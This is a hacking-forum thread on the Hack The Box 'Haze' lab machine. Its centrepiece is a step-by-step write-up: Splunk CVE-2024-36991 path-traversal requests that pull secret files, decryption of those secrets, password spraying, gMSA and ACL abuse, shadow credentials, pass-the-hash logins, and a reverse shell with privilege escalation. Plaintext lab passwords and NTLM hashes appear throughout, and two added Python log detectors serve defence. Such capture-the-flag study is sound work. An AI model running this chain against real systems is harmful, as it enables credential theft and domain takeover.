Haze - Hack The Box Season 7 - Windows Hard
by ShitWhiffler - Saturday March 29, 2025 at 06:59 PM
#61
(Apr 01, 2025, 12:55 PM)0zxc Wrote:
(Apr 01, 2025, 12:49 PM)nlea561 Wrote:
(Mar 29, 2025, 08:23 PM)potato_moose Wrote: evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb


How did you find Mark's username? With Taylor I am only able to find 3 other users, but not Mark.

crackmapexec smb 10.10.11.61 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute

Thanks man!! I was spamming --users.
Reply
#62
Then you do a password spray with those users and you get mark.adams )))
Reply
#63
(Apr 01, 2025, 12:55 PM)0zxc Wrote:
(Apr 01, 2025, 12:49 PM)nlea561 Wrote:
(Mar 29, 2025, 08:23 PM)potato_moose Wrote: evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb


how did you find mark's username ? with taylor i am only able to find 3 other users but not mark

crackmapexec smb 10.10.11.61 -u paul.taylor -p Ld@p_Auth_Sp1unk@2k24 --rid-brute

TGT:
python3 pywhisker.py -d haze.htb -u 'Haze-IT-Backup$' -H ':735C02C6B2DC54C3C8C6891F55279EBC' --target edward.martin --action "add"
python3 gettgtpkinit.py -cert-pfx KauKks8z.pfx -pfx-pass qsbBTgXXJr2eDHxmSpEW haze.htb/edward.martin edward.martin.ccache

Yeah, and after getting the .ccache file I am facing errors from secretsdump.py while trying to get the hash.
Errors: [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
Reply
#64
Full Haze machine write-up. Enjoy!

user flag

Initial enum
nmap <host>
nuclei --target http://<host>:8000 --tags splunk

Splunk CVE-2024-36991 exploit
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='

Poop rid & Spray piss
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'

ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all

gMSA_Managers group exploit
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

Pour the blood & drink it
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip

Support_Services group exploit
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6b2dc54c3c8c6891f55279ebc' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>

evil-winrm -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt

root flag

download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit

unzip, grep passwords & decrypt
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='

splunk creds admin:Sp1unkadmin@2k24
https://github.com/0xjpuff/reverse_shell_splunk
spawn meterpreter shell and exploit SeImpersonatePrivilege
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
# Welcome!

Bonus
evil-winrm -u 'Administrator' -H '06dc954d32cb91ac2831d67e3e12027f' -i <host>
Reply
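From a defender's side, the traversal requests in the Splunk CVE-2024-36991 step of the write-up above leave a recognisable trail in the Splunk Web access log. Added example (not from the write-up or any poster): a small Python detector run over constructed, combined-log-style lines; the exact log format, client IPs and timestamps are assumptions.

```python
"""Flag CVE-2024-36991-style path traversal against Splunk Web (port 8000).
Added example; the log lines are constructed and only approximate the
combined-log layout of Splunk's web_access.log."""
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample lines (not real telemetry).
SAMPLE_LOG = """\
10.0.0.5 - - [29/Mar/2025:20:10:01 +0000] "GET /en-US/account/login HTTP/1.1" 200 5123
10.0.0.9 - - [29/Mar/2025:20:11:44 +0000] "GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret HTTP/1.1" 200 254
10.0.0.9 - - [29/Mar/2025:20:11:49 +0000] "GET /en-US/modules/messaging/C%3A..%2FC%3A..%2FC%3A..%2FProgram%20Files/Splunk/etc/system/local/authentication.conf HTTP/1.1" 200 812
10.0.0.7 - - [29/Mar/2025:20:12:03 +0000] "GET /en-US/modules/messaging/app.js HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')
# The published vector abuses the /modules/messaging/ static handler with
# drive-letter-prefixed "C:../" segments; a plain "../" is caught as well.
TRAVERSAL_RE = re.compile(r'(?:[A-Za-z]:)?\.\./', re.IGNORECASE)
# Files whose disclosure turns the bug into credential exposure.
SENSITIVE = ("splunk.secret", "authentication.conf", "passwd")


def classify(line: str) -> Optional[dict]:
    """Return a finding for a traversal attempt, or None for a benign line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # Decode twice so percent-encoded and double-encoded dot-dot segments match.
    path = unquote(unquote(m.group("path")))
    if "/modules/messaging/" not in path.lower():
        return None
    hops = len(TRAVERSAL_RE.findall(path))
    if hops == 0:
        return None
    target = next((s for s in SENSITIVE if s in path.lower()), None)
    return {"ip": m.group("ip"), "ts": m.group("ts"), "hops": hops,
            "target": target, "severity": "high" if target else "medium"}


def scan(log_text: str) -> List[dict]:
    """Run classify() over every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```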
#65
evil-winrm'd in as edward.martin and was able to download it. Never actually tried using the LFI to download it (although in hindsight I should have, but even if it worked, how would one know to download it without already knowing to download it, kinda thing).
Reply
#66
Thanks for helping me, dog. Hackthebox machine, please.
Reply
#67
(Apr 01, 2025, 01:32 PM)john255 Wrote: Full Haze machine write-up. Enjoy!

I'm having some trouble in the bloodyAD part:

❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: argument {add,get,remove,set}: invalid choice: 'rc4' (choose from add, get, remove, set)

So removing -f rc4:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: unrecognized arguments: Haze-IT-Backup$
Reply
#68
(Mar 29, 2025, 10:39 PM)whaleflight Wrote:
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote: You can extract the gMSA account hash, then that account can add an owner to the Support_Services group, which I don't know tf I could do with this group.

I was not able to do that. Can you tell how?

Look for the GMSA section: https://notes.qazeer.io/active-directory...exploiting

Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash, no NTLM.


# Grant the principal by account name
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
# Alternatively, resolve the user first and pass its distinguished name
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

Then gMSADumper should work.

In cases where you don't have winrm access you can use this technique:
https://github.com/NicelyCla/exploit_GMSA_MANAGER
Reply
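The PrincipalsAllowedToRetrieveManagedPassword change discussed above is a write to the gMSA's msDS-GroupMSAMembership attribute, which a domain controller with directory service change auditing enabled records as Security event 5136. Added example (not any poster's code): a Python parser that flags such events; the event XML below is constructed and the approved-administrator set is an assumption.

```python
"""Flag 5136 (directory object modified) events that change who may read a
gMSA's managed password. Added example; SAMPLE_EVENT is constructed, not a
record captured from the box."""
import xml.etree.ElementTree as ET
from typing import Optional, Set

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# OperationType codes as documented for event 5136.
OPS = {"%%14674": "added", "%%14675": "deleted"}

# Constructed sample event (the DN and actor names come from the thread).
SAMPLE_EVENT = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>5136</EventID><Computer>dc01.haze.htb</Computer></System>
 <EventData>
  <Data Name="SubjectUserName">mark.adams</Data>
  <Data Name="ObjectDN">CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb</Data>
  <Data Name="ObjectClass">msDS-GroupManagedServiceAccount</Data>
  <Data Name="AttributeLDAPDisplayName">msDS-GroupMSAMembership</Data>
  <Data Name="OperationType">%%14674</Data>
 </EventData>
</Event>"""


def parse_5136(xml_text: str) -> Optional[dict]:
    """Return a finding when a 5136 event edits msDS-GroupMSAMembership, else None."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "5136":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    if data.get("AttributeLDAPDisplayName", "").lower() != "msds-groupmsamembership":
        return None
    op = data.get("OperationType", "")
    return {
        "actor": data.get("SubjectUserName"),
        "gmsa": data.get("ObjectDN"),
        "operation": OPS.get(op, op),
        "dc": root.findtext("e:System/e:Computer", namespaces=NS),
    }


def is_unexpected(finding: dict, approved_admins: Set[str]) -> bool:
    """Any change not made by an approved gMSA administrator deserves a ticket."""
    return finding["actor"] not in approved_admins


if __name__ == "__main__":
    f = parse_5136(SAMPLE_EVENT)
    print(f, "UNEXPECTED" if f and is_unexpected(f, {"svc-gmsa-admin"}) else "ok")
```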
#69
(Apr 04, 2025, 06:14 AM)DeathReaper Wrote:
(Apr 01, 2025, 01:32 PM)john255 Wrote: Full Haze machine write-up. Enjoy!
I'm having some trouble in the bloodyAD part:

❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: argument {add,get,remove,set}: invalid choice: 'rc4' (choose from add, get, remove, set)

So removing -f rc4:
❯ bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' set owner 'Support_Services' 'Haze-IT-Backup$'
usage: bloodyAD [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] [--host HOST] [--dc-ip DC_IP] [--gc] [-v {QUIET,INFO,DEBUG}] {add,get,remove,set} ...
bloodyAD: error: unrecognized arguments: Haze-IT-Backup$

I have encountered the same issue. Did you get past it?
Reply
#70
(Mar 31, 2025, 12:41 PM)littletonoone2 Wrote: Can someone post an explanation for getting edward.martin? I don't get why you are using pywhisker and what made y'all think you should use it?

Yeah, I'm in the same boat.

I understand that after running sharp/bloodhound a second time using haze-it-backup's we can see the path to edward.martin. Sure enough, we change the owner and give full control, given that we have a path/permissions to do so. But from here I only see the force password change, which isn't very relevant given that we don't have user interaction.

So what enumeration was run that points to using pywhisker from there?
Reply